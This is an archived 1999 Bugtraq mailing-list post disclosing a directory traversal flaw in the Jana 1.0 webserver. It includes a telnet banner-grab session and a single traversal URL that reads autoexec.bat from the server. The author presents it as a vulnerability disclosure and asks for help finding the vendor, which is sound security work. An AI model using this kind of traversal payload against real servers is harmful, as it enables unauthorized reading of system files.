[12178] in bugtraq
Jana webserver exploit
daemon@ATHENA.MIT.EDU (Jason Lutz)
Fri Oct 8 18:38:30 1999
Mime-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_NextPart_000_0103_01BF116B.875AA220"
Message-Id: <010601bf119d$d205db00$359b95d1@spis.net>
Date: Fri, 8 Oct 1999 09:00:11 -0600
Reply-To: Jason Lutz <jason@SPIS.NET>
From: Jason Lutz <jason@SPIS.NET>
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
This is a multi-part message in MIME format.
------=_NextPart_000_0103_01BF116B.875AA220
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Bugtraq,
I have found a security flaw in Jana 1.0 webserver. I have not been able =
to find out any information on who makes this product nor a place to =
download the web server package. This webserver seems to be included as =
a suite of Internet services, one of witch I think is web-based chat. =
Enclosed is one exploit I have found in the limited time that I have had =
to deal with this web server. I am posting this information now so that =
one of you might know who makes this software and how I might be able to =
get in touch with them for further testing.
.=20
[root@foo whis]# telnet x.x.x.x 80
Trying x.x.x.x...
Connected to x.x.x.x.
Escape character is '^]'.
GET / HTTP/1.0
HTTP/1.0 200 OK
Date: Mon, 04 Oct 1999 18:59:44 GMT
Server: Jana Server/1.40
Last-Modified: Mon, 04 Oct 1999 15:04:40 GMT
Content-Length: 38
Content-Type: text/html
Connection: close
<HTML><BODY><CENTER>TEST</BODY></HTML>Connection closed by foreign host.
[root@foo whis]#
http://server/....../autoexec.bat
Prints user's autoexec.bat
I would like to say thank you to rain.forest.puppy. for all his help.
Jason Lutz
Sprint Print Inc
jason@spis.net
------=_NextPart_000_0103_01BF116B.875AA220
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META content=3D"text/html; charset=3Diso-8859-1" =
http-equiv=3DContent-Type>
<META content=3D"MSHTML 5.00.2614.3500" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV>
<DIV>Bugtraq,</DIV>
<DIV> </DIV>
<DIV>I have found a security flaw in Jana 1.0 webserver. I have not been =
able to=20
find out any information on who makes this product nor a place to =
download the=20
web server package. This webserver seems to be included as a suite =
of=20
Internet services, one of witch I think is web-based chat. Enclosed =
is one=20
exploit I have found in the limited time that I have had to deal with =
this web=20
server. I am posting this information now so that one of you might =
know who=20
makes this software and how I might be able to get in touch with them =
for=20
further testing.</DIV>
<DIV> </DIV>
<DIV>.=20
<DIV>[root@foo whis]# telnet x.x.x.x 80<BR>Trying =
x.x.x.x...<BR>Connected=20
to x.x.x.x.<BR>Escape character is '^]'.<BR>GET / HTTP/1.0</DIV>
<DIV> </DIV>
<DIV>HTTP/1.0 200 OK<BR>Date: Mon, 04 Oct 1999 18:59:44 GMT<BR>Server: =
Jana=20
Server/1.40<BR>Last-Modified: Mon, 04 Oct 1999 15:04:40 =
GMT<BR>Content-Length:=20
38<BR>Content-Type: text/html<BR>Connection: close</DIV>
<DIV> </DIV>
<DIV><HTML><BODY><CENTER>TEST</BODY></HTML>=
Connection=20
closed by foreign host.<BR>[root@foo whis]#</DIV>
<DIV> </DIV>
<DIV><A=20
href=3D"http://server/....../autoexec.bat">http://server/....../autoexec.=
bat</A></DIV>
<DIV> </DIV>
<DIV>Prints user's autoexec.bat</DIV>
<DIV> </DIV>
<DIV> </DIV>
<DIV>I would like to say thank you to rain.forest.puppy. for all his =
help.</DIV>
<DIV> </DIV>
<DIV> </DIV>
<DIV>Jason Lutz</DIV>
<DIV>Sprint Print Inc</DIV>
<DIV><A href=3D"mailto:jason@spis.net">jason@spis.net</A></DIV>
<DIV> </DIV></DIV></DIV></BODY></HTML>
------=_NextPart_000_0103_01BF116B.875AA220--
